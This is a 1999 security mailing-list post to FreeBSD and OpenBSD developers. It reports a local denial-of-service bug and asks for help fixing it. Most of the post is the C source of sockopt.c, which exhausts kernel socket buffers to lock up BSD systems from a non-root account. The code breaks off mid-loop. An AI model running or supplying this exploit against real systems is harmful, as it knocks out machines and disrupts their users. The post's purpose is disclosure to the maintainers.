Date:      Fri, 17 Dec 1999 01:09:40 EST
From:      "jason schwab" <jasonschwab@hotmail.com>
To:        freebsd-security@freebsd.org, openbsd-tech@openbsd.org
Cc:        rojah@uswest.net, skalir@uswest.net, ghandi@mindless.com, skalir@hotmail.com
Subject:   !!!really, really big problem with *BSD!!!

I was surfing the net and talking on irc, as usual, I see this
sockopt.c file, my friend sends me it, he tells me it'll lock up
any openbsd / netbsd / freebsd server, just compile normally and run
it.. poof locks up...

I tried it on OpenBSD 2.5, OpenBSD 2.6, FreeBSD 3.1-RELEASE,
FreeBSD 3.2-STABLE, FreeBSD 3.3-RELEASE and FreeBSD 3.3-STABLE

and it WORKED.

can we work together on fixxing this? non-root user, just compiles
and runs, and poof system locks up.

Thanks,
Jason L. Schwab

(below is the sockopt.c file, also found on www.hack.co.za)

<......snip.......>
/*
  FreeBSD FreeBSD 3.2
  NetBSD NetBSD 1.4
  OpenBSD OpenBSD 2.5
*/

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
  int p[2], i;
  char crap[BUFFERSIZE];

  while (1)
  {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
    break;
    i = BUFFERSIZE;
    setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
    setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
    setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
    setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
    fcntl(p[0], F_SETFL, O_NONBLOCK);
    fcntl(p[1], F_SETFL, O_NONBLOCK);
    write(p[0], crap, BUFFERSIZE);
    write(p[1], crap, BUFFERSIZE);